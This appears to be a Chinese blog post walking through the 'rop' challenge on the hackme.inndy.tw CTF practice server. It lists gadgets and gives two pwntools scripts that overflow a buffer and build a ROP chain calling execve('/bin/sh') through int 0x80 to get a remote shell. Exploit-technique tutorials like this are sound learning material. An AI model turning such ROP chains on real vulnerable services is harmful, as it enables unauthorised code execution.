ROP(ropchain)

check一下,發(fā)現(xiàn)只開了NX


image.png

拖進(jìn)ida,發(fā)現(xiàn)里面有堆出現(xiàn),但是和本題的關(guān)系不太大,題目提示用ROP,就直接系統(tǒng)調(diào)用吧。


image.png

image.png
0x080b8016 : pop eax ; ret
0x080481c9 : pop ebx ; ret
0x080de769 : pop ecx ; ret
0x0806ecda : pop edx ; ret
0x0804b5ba : pop dword ptr [ecx] ; ret
image.png

腳本一

#-*-coding:utf-8-*-
from pwn import *
from LibcSearcher import *
from struct import pack

context(terminal = ['gnome-terminal', '-x', 'sh', '-c'], arch = 'i386', os = 'linux', log_level = 'debug')

def debug(addr = '0x08048892'):
    raw_input('debug:')
    gdb.attach(sh, "b *" + addr)

elf = ELF('rop')
bss_addr = elf.bss()
print "%x" % bss_addr

sh = remote('hackme.inndy.tw', 7704)
p = 'A' * 0x10
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80
sh.sendline(p)
sh.interactive()
sh.close()

腳本二

#-*-coding:utf-8-*-
from pwn import *
p = process('./rop')
p = remote("hackme.inndy.tw","7704")
elf = ELF('./rop')
bss_addr = elf.bss()
pop_in_ecx = 0x0804b5ba
pop_eax = 0x080b8016
pop_ebx = 0x080481c9
pop_ecx = 0x080de769
pop_edx = 0x0806ecda
int_0x80 = 0x0806c943
payload = 16*'a'
payload += p32(pop_ecx) + p32(bss_addr)
payload += p32(pop_in_ecx) + '/bin'
payload += p32(pop_ecx) + p32(bss_addr+4)
payload += p32(pop_in_ecx) + '/sh\x00'
payload += p32(pop_eax) + p32(0xb)
payload += p32(pop_ebx) + p32(bss_addr)
payload += p32(pop_ecx) + p32(0)
payload += p32(pop_edx) + p32(0)
payload += p32(int_0x80)
p.sendline(payload)
p.interactive()
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 依照產(chǎn)品需求當(dāng)用戶輸入手機號,銀行卡是能自動格式化(添加分隔符),方便用戶輸入、閱讀;同時手機號輸入不能超過11位...
    大_川閱讀 602評論 0 1
  • 談話讓人舒服的程度決定你的高度! 職場上,有這樣兩種截然相反的人。有人生怕別人舒服,盡量讓別人不舒服,而只要自己舒...
    jianghu000閱讀 825評論 0 1
  • 傻二爺是我的鄰居,今年六十八了,瘦高的個子。他不像村里其他人一樣,大都出去打工了。他在村子里,從小到現(xiàn)在,一輩子都...
    陪月亮摘星星閱讀 633評論 20 16
  • 不知道從什么時候起,不斷地忙碌成為了生活的總體部分,變的更加具有目的,卻更加迷惘。失去方向的人會拼命向前跑,可前路...
    一生_9c64閱讀 176評論 0 0
  • 好像很多人都會問伴侶“你愛我嗎?” 但這個問題真的有意義嗎? 今天看了一齣電影《我的男友和狗》,奔著感覺會是催淚電...
    jadelu1閱讀 329評論 0 1

友情鏈接更多精彩內(nèi)容